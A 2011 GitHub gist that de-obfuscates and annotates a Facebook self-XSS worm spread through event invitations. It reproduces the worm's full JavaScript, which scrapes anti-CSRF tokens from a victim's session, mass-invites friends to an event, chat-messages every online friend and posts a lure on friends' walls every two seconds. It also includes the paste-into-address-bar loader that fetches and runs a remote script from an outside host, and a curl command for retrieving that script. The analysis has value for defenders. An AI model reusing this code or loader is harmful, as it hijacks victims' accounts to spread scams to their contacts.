@ccoenen
Created April 26, 2011 19:42
De-Obfuscation of the Facebook-Exploit
// # The Exploit comes as an event-invitation, it wants you to click this link
// http://www.goo gle.com/url?sa=t&source=web&cd=1&ved=0CBoQFjAA&url=http%3A%2F%2Fwho-spying-u.blogspot.com%2F&ei=SHO2TaA kiNiIAve95Sk&usg=AFQjCNH_JxkE7o8CvUwsLVUwr2eGGP4ecw&sig2=Ye1vqVHrMDHWkRv--npMkw%3 Fqw020fbs (remove spaces if interested)
// # The link is a redirect to ht tp: //ge rman -spy3 .bl ogsp ot.c om/ (remove spaces if interested)
// # you are directed to copy and paste a snippet of JS code into your address-bar, see loader.js below.
// # This script was taken from iamedwards.com on 2011-04-26
// this file can be downloaded by using curl with a referer and user-agent like this:
// curl -i -e "http://www.facebook.com" -A "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0" http://iamedwards.com/german.php?0.214
// # ran it through a beautifier
// # ran it through a for-loop to de-obfuscate the texts like this: for (var t in _0x8a40) { document.write('"'+_0x8a40[t] + '", '); }
// # started commenting the _texte[xy] meanings nearby
/** string table produced by the obfuscator. The code addresses everything as _texte[n]; the index markers are the
 * de-obfuscation aid. 0-4 are the lure texts and URLs (the indicators worth blocking or searching logs for), the rest
 * are DOM/XHR property names, facebook ajax endpoints and form field names. */
var _texte=[ /* 0 */ "%firstname% wow facebook kann dir jetzt anzeigen wer dein Profil ansieht! Schaus dir an @ ow.ly/4GpHi", // [0] chat lure ("wow, facebook can now show you who views your profile"); %firstname% is filled in per recipient
"Meine Top Profil-Stalker:\n %tf% - 1136 Besuche\n %tf% - 983 Besuche \n %tf% - 542 Besuche \n %tf% - 300 Besuche \n Schau dir an wer dein Profil sieht @ http://ilikeclinton.com?u28xt5ga", // [1] wall post lure ("my top profile stalkers"); each %tf% becomes a tagged friend
"http://germancpa.blogspot.com/", // [2] final redirect target
"Schau dir deine Profil-Stalker an - http://www.google.com/url?sa=t&source=web&cd=1&ved=0CBoQFjAA&url=http%3A%2F%2Fwho-spying-u.blogspot.com%2F&ei=SHO2TaAkiNiIAve95Sk&usg=AFQjCNH_JxkE7o8CvUwsLVUwr2eGGP4ecw&sig2=Ye1vqVHrMDHWkRv--npMkw?u28xt5ga ~~ u28xt5ga ", // [3] event description; the link is the same google.com/url redirect wrapper as in the invitation
"WOW Jetzt kannst du sehen wer sich dein Profil ansieht! (u28xt5ga)", // [4] event name
/* 5 */ "href", "location", "top", "GET",
"open",
/* 10 */ "onreadystatechange",
"readyState",
"status",
"responseText",
"send",
"/",
"match",
"cookie",
"@[",
"id",
/* 20 */ ":",
"name",
"]",
"",
"&",
"=",
"POST",
"Content-Type",
"application/x-www-form-urlencoded",
"setRequestHeader",
/* 30 */ "div",
"createElement",
"display",
"style",
"block",
"position",
"absolute",
"width",
"%",
"height",
/* 40 */ "left",
"px",
"textAlign",
"center",
"padding",
"4px",
"background",
"#FFFFFF",
"zIndex",
"innerHTML",
/* 50 */ "&nbsp;<br>Verifiziere deinen Code - Bitte gedulde dich einen kleinen Moment.<br><br> We are processing the offer for you... <a href="javascript:void(0);" onclick="wf=0; mf();">click here</a><br><img src="http://genetics.bwh.harvard.edu/snp2rflp/circle.gif">", // [50] overlay markup ("verifying your code, please wait"); the link resets wf and calls mf(), i.e. redirects immediately; the spinner gif is hot-linked from a third-party site
"appendChild",
"body",
"data",
"firstChild",
"navAccountName",
"getElementById",
"?",
"/ajax/choose/?__a=1", // [58] returns the token needed for the typeahead request
"event",
/* 60 */ "AsyncRequest",
"/ajax/typeahead/first_degree.php?__a=1&amp;viewer=", // [61..63] friend list (typeahead, friends only)
"&amp;token=",
"&amp;filter[0]=user&amp;options[0]=friends_only&amp;options[1]=nm&amp;options[2]=sort_alpha",
"length",
"push",
"getTime",
"setTime",
"getMonth",
"getDate",
/* 70 */ "getFullYear",
"getHours",
",",
"join",
"on",
"Create Event",
"new",
"/events/create.php", // [77] event creation
"/ajax/chat/buddy_list.php?__a=1", // [78] list of friends currently online
"substr",
/* 80 */ "(",
")",
"buddy_list",
"payload",
"nowAvailableList",
"random",
"floor",
"%firstname%",
"toLowerCase",
"firstName",
/* 90 */ "userInfos",
"replace",
"/ajax/chat/send.php?__a=1", // [92] chat message
"/ajax/browser/friends/?uid=", // [93..94] friends browser (all friends, ids + names)
"&amp;filter=all&amp;__a=1&amp;__d=1",
"shift",
"fetched friends: ",
"home",
"pop",
"%tf%",
/* 100 */ "search",
"xhpc_message_text",
"xhpc_message",
"message text: ",
"/ajax/updatestatus.php?__a=1", // [104] status update / wall post
"profile"
];
var chatmessage = _texte[0]; // lure sent via chat to every friend that is online
var postmessage = _texte[1]; // lure posted on the victim's own wall and on friends' walls
var redirect = _texte[2]; // where the victim ends up at the end (see mf); userid and name get appended later
var eventdesc = _texte[3]; // description of the event all friends get invited to
var eventname = _texte[4];
var nfriends = 5000; // upper bound for the number of friends' walls to post on
var debug = false; // true -> alert() with the friend count and the message text
var wf = 0; // "work pending" counter: each branch does wf++ when it starts and mf(--wf) when done
/** mf is used for a redirect after a short delay. It is used as a cancel-method when somebody clicks the "offer"-link.
 * wf counts the pieces of work still pending; the redirect only happens once it is back at 0. The overlay's
 * "click here" link (see _texte[50]) sets wf=0 and calls mf(), so the victim can trigger the redirect at any time.
 * mf takes no parameter - the argument passed in the mf(--wf) calls elsewhere is ignored. */
var mf = function() {
if (wf <= 0) { // nothing pending any more
setTimeout(function() {
// redirecting to the url in _texte[2]. Unfortunately that url was no longer valid when i got here.
window[_texte[7]][_texte[6]][_texte[5]] = redirect; // top / location / href
},
500);
};
};
/** makes a xhr GET request to the given url. Calls callback with resulting text (only on HTTP 200) and callback2
 * without parameters (on completion, whatever the status). All urls used are relative, so these are same-origin
 * requests on facebook.com and carry the victim's session cookies. */
var doget = function(url, _callback, _callback2) {
var _xhr = new XMLHttpRequest();
_xhr[_texte[9]](_texte[8], url); // open / GET
_xhr[_texte[10]] = function() { // onreadystatechange
if (_xhr[_texte[11]] == 4) { // readyState (4 = done)
if (_xhr[_texte[12]] == 200 && _callback) { // status
_callback(_xhr[_texte[13]]); // call callback with responseText
};
if (_callback2) {
_callback2();
};
};
};
_xhr[_texte[14]](); // calling send() method.
};
/**
 * Entry point. Fetches the victim's own facebook home page ("/") and does all the work in the callback.
 * As far as this code shows nothing exploits a flaw in facebook: the victim pastes the loader into the address bar
 * of an already logged-in session (self-XSS), so every XHR below is same-origin and carries the session cookies, and
 * the anti-CSRF tokens (post_form_id, fb_dtsg) are simply scraped from the page HTML. What it then does, in order:
 * create an event with all friends invited, chat-message every online friend, post the lure on the victim's wall
 * and then on one friend's wall every 2 seconds, and finally redirect to _texte[2]. From a detection point of view
 * the pattern is one session issuing a mass invite, a chat message to every online contact and a stream of
 * wall posts at a fixed 2s interval.
 */
doget(_texte[15], // "/" (yeah, a single slash)
function(_attr1) { // _attr1 = the HTML of the home page
// personal learning: it never occurred to me, but since functions are regular objects
// it's actually possible to address a function like mystring.match() in this way mystring['match']()
/** stores the facebook user ID, retrieved from the cookie (c_user). match() returns null when the cookie is missing, so this line throws if the victim is not logged in */
var _fbUserID = document[_texte[17]][_texte[16]](/c_user=(\d+)/)[1]; // cookie, match
/** converts an object containing "id" and "name" properties to the form of "@[id:name]", defaults to empty string.
 * "@[id:name]" is presumably the markup facebook's composer used for tagging a person in a post - the tagged version
 * goes into xhpc_message, the plain-name version (see _getNamePropertyOf) into xhpc_message_text */
var _0x93d3x11 = function(obj) {
return obj ? _texte[18] + obj[_texte[19]] + _texte[20] + obj[_texte[21]] + _texte[22] : _texte[23];
// return obj ? "@[" + obj["id"] + ":" + obj["name"] + "]" : ""; // if set, return @[id:name], otherwise empty string
};
/** returns the "name" property of a given attribute, defaults to empty string. */
var _getNamePropertyOf = function(obj) {
return obj ? obj[_texte[21]] : _texte[23]; // name, "" (empty string)
};
/** encodes an object as application/x-www-form-urlencoded (key=encodedValue pairs chained by "&"), defaults to empty string.
 * A null value yields a bare key without "=" (the "lsd: null" / "eid: null" fields below).
 * Note: "out" is assigned without var, so it leaks as a global. */
var _urlencode = function(_innerAttr1) {
out = _texte[23]; // empty string
for (var _key in _innerAttr1) {
out += (out ? _texte[24] : _texte[23]) + _key + ((_innerAttr1[_key] !== null) ? _texte[25] + encodeURIComponent(_innerAttr1[_key]) : _texte[23]);
};
return out;
};
/** posts to url, sending along the given postData (form-encoded via _urlencode), compare to #doget.
 * _callback gets the responseText on HTTP 200, _secondCallback runs on completion regardless of status. */
var _doPost = function(url, postData, _callback, _secondCallback) {
var _xhr = new XMLHttpRequest();
_xhr[_texte[9]](_texte[26], url); // open, POST
_xhr[_texte[29]](_texte[27], _texte[28]); // setting content type
_xhr[_texte[10]] = function() { // onreadystatechange
if (_xhr[_texte[11]] == 4) { // readyState (4 = done)
if (_xhr[_texte[12]] == 200 && _callback) { // status
_callback(_xhr[_texte[13]]); // call callback with responseText
};
if (_secondCallback) {
_secondCallback();
};
};
};
_xhr[_texte[14]](_urlencode(postData)); // calling send() method with supplied data
};
/** creates the fake-user interface containing the "click here" link, starting the mf() function.
 * It is a full-window (100% x 100%, top/left 0) white div with a huge z-index, so it hides the page while the
 * requests run. The markup (_texte[50]) shows a "verifying your code, please wait" text, a link whose onclick does
 * "wf=0; mf();" (immediate redirect) and a spinner gif hot-linked from a third-party site. */
var _createOverlay = function() {
var elem = document[_texte[31]](_texte[30]); // createElement('div')
// styles
elem[_texte[33]][_texte[32]] = _texte[34]; // display block
elem[_texte[33]][_texte[35]] = _texte[36]; // position absolute
elem[_texte[33]][_texte[37]] = 100 + _texte[38]; // w+h 100%, top+left 0,0
elem[_texte[33]][_texte[39]] = 100 + _texte[38];
elem[_texte[33]][_texte[40]] = 0 + _texte[41];
elem[_texte[33]][_texte[7]] = 0 + _texte[41];
elem[_texte[33]][_texte[42]] = _texte[43]; // textAlign center
elem[_texte[33]][_texte[44]] = _texte[45]; // padding 4px
elem[_texte[33]][_texte[46]] = _texte[47]; // white bg
elem[_texte[33]][_texte[48]] = 999999; // high zIndex
// contains the text that presents you a "click here" link which starts mf()-function. Also shows the loading-spinner.
// clicking that link will reset the wf-counter and call mf, redirecting you to another site (apparently with a very special offer)
elem[_texte[49]] = _texte[50];
document[_texte[52]][_texte[51]](elem); // body.appendChild()
};
/** the composer id scraped from the home page HTML is needed for the status update requests. "comp" is an implicit global. */
var _0x93d3x19 = _attr1[_texte[16]](/name=\\"xhpc_composerid\\" value=\\"([\d\w]+)\\"/i);
if (_0x93d3x19) {
comp = _0x93d3x19[1];
} else {
comp = _texte[23];
};
/** post_form_id and fb_dtsg are facebook's anti-CSRF tokens; because this runs inside the page they can simply be
 * scraped from the HTML and replayed in every POST below. Both lookups index [1] on the match result without a null
 * check, so the script dies with a TypeError here if the markup does not contain them. */
var _0x93d3x1a = _attr1[_texte[16]](/name="post_form_id" value="([\d\w]+)"/i)[1];
var _0x93d3x1b = _attr1[_texte[16]](/name="fb_dtsg" value="([\d\w]+)"/i)[1];
var _0x93d3x1c = document[_texte[56]](_texte[55])[_texte[54]][_texte[53]]; // getElementById('navAccountName').firstChild.data -> the victim's display name
// the redirect target gets ?userid=...&name=...&doclose=1 appended, so the site at _texte[2] presumably learns which account ran the script
redirect = redirect + _texte[57] + _urlencode({
userid: _fbUserID,
name: _0x93d3x1c,
doclose: 1
});
_createOverlay();
// --- branch 1: create an event (tomorrow, same hour) with the lure as description and ALL friends invited ---
if (eventdesc) {
wf++; // one more piece of pending work before mf() may redirect
_doPost(_texte[58], { // POST /ajax/choose/?__a=1 - the response contains a "token" needed for the typeahead request
type: _texte[59], // event
eid: null,
invite_message: _texte[23],
__d: 1,
post_form_id: _0x93d3x1a,
fb_dtsg: _0x93d3x1b,
lsd: null,
post_form_id_source: _texte[60] // AsyncRequest
},
function(_0x93d3x1d) {
var _0x93d3x1e = _0x93d3x1d[_texte[16]](/\\"token\\":\\"([^\\]+)\\"/)[1]; // the token out of the (JS-escaped) response
var _0x93d3xb = _texte[61] + _fbUserID + _texte[62] + _0x93d3x1e + _texte[63]; // /ajax/typeahead/first_degree.php?...viewer=<id>&token=<token>&filter[0]=user&options[0]=friends_only...
doget(_0x93d3xb,
function(_0x93d3x1f) {
var _0x93d3x20 = _0x93d3x1f[_texte[16]](/\{"uid":\d+,/g); // every {"uid":NNN, chunk of the friend list
var _0x93d3x21 = []; // uids of all friends except the victim itself
for (var _0x93d3x22 = 0; _0x93d3x22 < _0x93d3x20[_texte[64]]; _0x93d3x22++) {
var _0x93d3x23 = _0x93d3x20[_0x93d3x22][_texte[16]](/:(\d+),/)[1];
if (_0x93d3x23 != _fbUserID) {
_0x93d3x21[_texte[65]](_0x93d3x23); // push
};
};
var _0x93d3x24 = new Date();
_0x93d3x24[_texte[67]](_0x93d3x24[_texte[66]]() + 60 * 60 * 24 * 1000); // setTime(getTime() + 24h): the event is tomorrow
datestr = (_0x93d3x24[_texte[68]]() + 1) + _texte[15] + _0x93d3x24[_texte[69]]() + _texte[15] + _0x93d3x24[_texte[70]](); // "M/D/YYYY" (getMonth is 0-based, hence +1); implicit global
timestr = _0x93d3x24[_texte[71]]() * 60; // getHours()*60 -> minutes since midnight; implicit global
var _0x93d3x25 = { // the create-event form
post_form_id: _0x93d3x1a,
fb_dtsg: _0x93d3x1b,
start_dateIntlDisplay: datestr,
start_date: datestr,
start_time_hour_min: timestr,
name: eventname,
place_page_id: _texte[23],
location: _texte[23],
street: _texte[23],
geo_id: _texte[23],
geo_sq: _texte[23],
desc: eventdesc, // the lure text with the link
sgb_invitees: _0x93d3x21[_texte[73]](_texte[72]), // all friend ids joined by ","
sgb_emails: _texte[23],
sgb_message: _texte[23],
privacy_type: _texte[74], // "on"
guest_list: _texte[74],
connections_can_post: _texte[74],
save: _texte[75], // "Create Event"
submitting: _texte[23]
};
_0x93d3x25[_texte[76]] = _texte[23]; // new = ""
_doPost(_texte[77], _0x93d3x25, false, // POST /events/create.php
function() {
mf(--wf); // this branch is done; mf ignores the argument and only looks at wf
});
});
});
};
// --- branch 2: chat-message every friend that is currently online ---
if (chatmessage) {
wf++;
_doPost(_texte[78], { // POST /ajax/chat/buddy_list.php?__a=1
user: _fbUserID,
post_form_id: _0x93d3x1a,
fb_dtsg: _0x93d3x1b,
lsd: null,
post_form_id_source: _texte[60],
popped_out: false,
force_render: true
},
function(_0x93d3x1d) {
var _0x93d3x26 = _0x93d3x1d[_texte[79]](9); // substr(9): drops the first 9 characters, presumably the "for (;;);" prefix facebook puts in front of its JSON responses
var _0x93d3x27 = eval(_texte[80] + _0x93d3x26 + _texte[81]); // eval("(" + json + ")") - the server response is executed as code rather than parsed
var _0x93d3x28 = _0x93d3x27[_texte[83]][_texte[82]]; // payload.buddy_list
for (var _0x93d3x29 in _0x93d3x28[_texte[84]]) { // nowAvailableList: the keys are the uids of the friends that are online
// the next three locals are assigned but never used; the same expressions are recomputed inline in the POST below
var _0x93d3x2a = Math[_texte[86]](Math[_texte[85]]() * 1335448958);
var _0x93d3x2b = (new Date())[_texte[66]]();
var _0x93d3x2c = chatmessage[_texte[91]](_texte[87], _0x93d3x28[_texte[90]][_0x93d3x29][_texte[89]][_texte[88]]());
_doPost(_texte[92], { // POST /ajax/chat/send.php?__a=1 - one per online friend
msg_id: Math[_texte[86]](Math[_texte[85]]() * 1335448958), // floor(random()*N) as a made-up message id
client_time: (new Date())[_texte[66]](), // getTime()
msg_text: chatmessage[_texte[91]](_texte[87], _0x93d3x28[_texte[90]][_0x93d3x29][_texte[89]][_texte[88]]()), // replace("%firstname%", userInfos[uid].firstName.toLowerCase())
to: _0x93d3x29,
post_form_id: _0x93d3x1a,
fb_dtsg: _0x93d3x1b,
post_form_id_source: _texte[60]
});
};
mf(--wf); // fired right after the loop has queued the requests; it does not wait for them to complete
});
};
// --- branch 3: post the lure on the victim's own wall, then on one friend's wall every 2 seconds ---
if (postmessage) {
wf++;
doget(_texte[93] + _fbUserID + _texte[94], // GET /ajax/browser/friends/?uid=<id>&filter=all&__a=1&__d=1 - the "browse friends" page
function(_0x93d3x1d) {
// one match per friend: from the profile picture file name (<digits>_<digits>_<digits>_q.jpg) up to the closing </a> of the name link
// (the markup comes JS-escaped, hence the \u003c and \\/ in the pattern)
var _0x93d3x20 = _0x93d3x1d[_texte[16]](/\/\d+_\d+_\d+_q\.jpg.*?u003ca href=\\"http:\\\/\\\/www.facebook.com\\\/.*?\\u003c\\\/a>/gi);
var _0x93d3x2d = []; // [{id, name}] for every friend found
if (_0x93d3x20) {
for (var _0x93d3x22 = 0; _0x93d3x22 < _0x93d3x20[_texte[64]]; _0x93d3x22++) {
var _0x93d3x23 = _0x93d3x20[_0x93d3x22][_texte[16]](/_\d+_/)[0][_texte[91]](/_/g, _texte[23]); // first "_<digits>_" of the file name, underscores stripped -> apparently the friend's id
var _0x93d3x2e = _0x93d3x20[_0x93d3x22][_texte[16]](/>[^>]+\\u003c\\\/a>$/i)[0][_texte[91]](/\\u003c\\\/a>$/gim, _texte[23])[_texte[91]](/>/g, _texte[23]); // text between the last ">" and the closing </a> -> the friend's name
_0x93d3x2d[_texte[65]]({
id: _0x93d3x23,
name: _0x93d3x2e
});
};
};
// random-order copies of the friend list: each round picks a random entry, appends it to both lists and removes it
// from _0x93d3x2d (shift the first element and move it into the hole left by the pick). Both lists get the same order.
var _0x93d3xd = []; // consumed from the end (pop) to fill the %tf% placeholders
var _0x93d3x2f = []; // consumed from the front (shift) as the walls to post on
while (_0x93d3x2d[_texte[64]]) {
var _0x93d3x30 = Math[_texte[86]](Math[_texte[85]]() * _0x93d3x2d[_texte[64]]); // floor(random() * length)
_0x93d3xd[_texte[65]](_0x93d3x2d[_0x93d3x30]);
_0x93d3x2f[_texte[65]](_0x93d3x2d[_0x93d3x30]);
var _0x93d3x2b = _0x93d3x2d[_texte[95]](); // shift
if (_0x93d3x30) {
_0x93d3x2d[_0x93d3x30 - 1] = _0x93d3x2b; // after the shift the picked entry sits at index-1; overwrite it with the shifted-out one
};
};
if (debug) {
alert(_texte[96] + _0x93d3xd[_texte[64]]); // "fetched friends: N"
};
var _0x93d3x31 = { // status update form for the victim's OWN wall
post_form_id: _0x93d3x1a,
fb_dtsg: _0x93d3x1b,
xhpc_composerid: comp,
xhpc_targetid: _fbUserID,
xhpc_context: _texte[97], // home
xhpc_fbx: _texte[23],
lsd: null,
post_form_id_source: _texte[60]
};
// fill the %tf% placeholders one by one, each with a friend taken from the end of the shuffled list.
// mt = plain names (goes into xhpc_message_text), m = "@[id:name]" tags (goes into xhpc_message), so the post tags
// the friends. Both are implicit globals.
mt = postmessage;
m = postmessage;
while (mt[_texte[100]](_texte[99]) >= 0) { // search("%tf%") >= 0, i.e. while a placeholder is left
var _0x93d3x32 = _0x93d3xd[_texte[98]](); // pop; undefined once the list is empty, the helpers then return ""
mt = mt[_texte[91]](_texte[99], _getNamePropertyOf(_0x93d3x32)); // replace() with a string pattern replaces only the first occurrence
m = m[_texte[91]](_texte[99], _0x93d3x11(_0x93d3x32));
};
_0x93d3x31[_texte[101]] = mt; // xhpc_message_text
_0x93d3x31[_texte[102]] = m; // xhpc_message
if (debug) {
alert(_texte[103] + mt); // "message text: ..."
};
_doPost(_texte[104], _0x93d3x31); // POST /ajax/updatestatus.php?__a=1 - no callbacks, fire and forget
/** posts the same message on the wall of the next friend in _0x93d3x2f, then schedules itself again after 2s.
 * _0x93d3x15 counts down from nfriends. Stops - resetting wf to 0 and redirecting via mf() - when the counter reaches 0
 * or when the name pool _0x93d3xd is empty. Note the shift and the id lookup happen before the empty-pool check; with
 * the four %tf% in postmessage the name pool drains faster than the target list, so in practice the check fires first. */
var _0x93d3x33 = function(_0x93d3x15) {
if (_0x93d3x15 == 0) {
wf = 0;
mf();
return;
};
var _0x93d3x34 = _0x93d3x2f[_texte[95]](); // shift: next friend to post to
var _0x93d3x35 = { // same form as above, but targeting the FRIEND's wall
post_form_id: _0x93d3x1a,
fb_dtsg: _0x93d3x1b,
xhpc_composerid: comp,
xhpc_targetid: _0x93d3x34[_texte[19]], // friend id
xhpc_context: _texte[105], // profile
xhpc_fbx: 1,
lsd: null,
post_form_id_source: _texte[60]
};
var _0x93d3x36 = postmessage;
var _0x93d3x37 = postmessage;
if (_0x93d3xd[_texte[64]] == 0) { // no names left for the placeholders -> finish and redirect
wf = 0;
mf();
return;
};
while (_0x93d3x36[_texte[100]](_texte[99]) >= 0) { // same placeholder filling as for the own wall
var _0x93d3x38 = _0x93d3xd[_texte[98]]();
_0x93d3x36 = _0x93d3x36[_texte[91]](_texte[99], _getNamePropertyOf(_0x93d3x38));
_0x93d3x37 = _0x93d3x37[_texte[91]](_texte[99], _0x93d3x11(_0x93d3x38));
};
_0x93d3x35[_texte[101]] = _0x93d3x36;
_0x93d3x35[_texte[102]] = _0x93d3x37;
_doPost(_texte[104], _0x93d3x35); // POST /ajax/updatestatus.php?__a=1 onto the friend's wall
setTimeout(function() {
_0x93d3x33(_0x93d3x15 - 1);
},
2000); // one friend's wall every 2 seconds
};
wf++;
setTimeout(function() {
_0x93d3x33(nfriends); // start the wall-posting loop, up to nfriends walls
},
2000);
});
};
mf(); // if none of the branches ran (wf still 0) this redirects right away; otherwise the last branch to finish does
});
// loader.js - the one-liner the victim is told to paste into the address bar. The "javascript:" scheme runs it in the
// context of the currently open page (facebook.com), which is what gives the fetched german.php the logged-in session
// it abuses; the Math.random() query string is presumably just a cache buster.
javascript:(a=(b=document).createElement('script')).src='//iamedwards.com/german.php?'+Math.random(),b.body.appendChild(a);void(0)
// this is pretty straightforward. Create a script-node, set its source and append it to the body.
// you can't download the JS directly, you need to set the right referer or you'll be redirected to google.
ghost commented Nov 8, 2012

do you also have the source of the iamedwards.com/german.php file?
